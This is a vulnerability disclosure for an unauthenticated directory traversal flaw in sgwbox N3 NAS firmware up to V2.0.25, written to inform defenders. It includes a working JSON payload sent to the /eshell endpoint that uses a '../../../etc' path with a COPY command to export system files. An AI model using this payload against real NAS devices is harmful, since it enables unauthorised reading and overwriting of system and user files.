sgwbox NAS N3 Directory Traversal

Information

Vendor: sgwbox

Affected products: N3 NAS ≤ V2.0.25

Vendor Homepage: https://mall.sgwbox.com/

Vendor contact information: mailto:box@new1cloud.com

Description

The sgwbox NAS N3 contains an unauthorized directory traversal vulnerability. Attackers without authorization can exploit this vulnerability to remotely obtain arbitrary files within the target NAS device's system, export the entire internal system (including system files and user files), and even can perform arbitrary path write operations on the remote NAS device's internal system, seriously compromising confidentiality, integrity, and availability.

Exploitation Process

Without authentication, an attacker sends a POST request message in JSON format to the /eshell API interface without any token information.

{
  "params": [
    "/mnt/usb1/winmt/../../../etc",
    "/mnt/usb1/winmt"
  ],
  "cmd": "COPY"
}

This allows the attacker to export the /etc directory from the NAS system.

This is just one example and attackers could exploit this vulnerability to export all system/user files in the NAS, or even overwrite them.

Information

Description

Exploitation Process

Credit

`NASchecker`